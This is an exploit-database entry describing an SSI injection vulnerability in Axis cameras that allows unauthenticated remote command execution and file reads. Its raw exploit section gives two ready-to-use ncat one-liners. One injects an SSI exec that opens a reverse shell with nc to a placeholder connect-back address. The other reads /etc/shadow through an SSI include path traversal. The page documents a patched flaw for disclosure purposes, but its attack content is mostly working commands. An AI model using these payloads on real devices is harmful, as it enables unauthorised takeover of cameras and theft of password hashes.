SSI Remote Execute and Read Files

vendor:

Camera

by:

bashis

8,8

CVSS

HIGH

Remote Code Execution and File Read

CWE

Product Name: Camera

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

SSI Remote Execute and Read Files

This vulnerability allows an attacker to execute remote commands and read remote files on an Axis camera. The attacker must first configure the camera to allow anonymous view. To execute remote commands, the attacker must send a GET request with a command encoded in the URL. To read remote files, the attacker must send a GET request with the file path encoded in the URL. Both requests must be sent to the target IP and port.

Mitigation:

The camera must be configured to not allow anonymous view.

Source

Exploit-DB raw data:

[STX]

Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)

Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The cam must be configure to allow anonymous view

Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>

Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT


Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>

Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT

[ETX]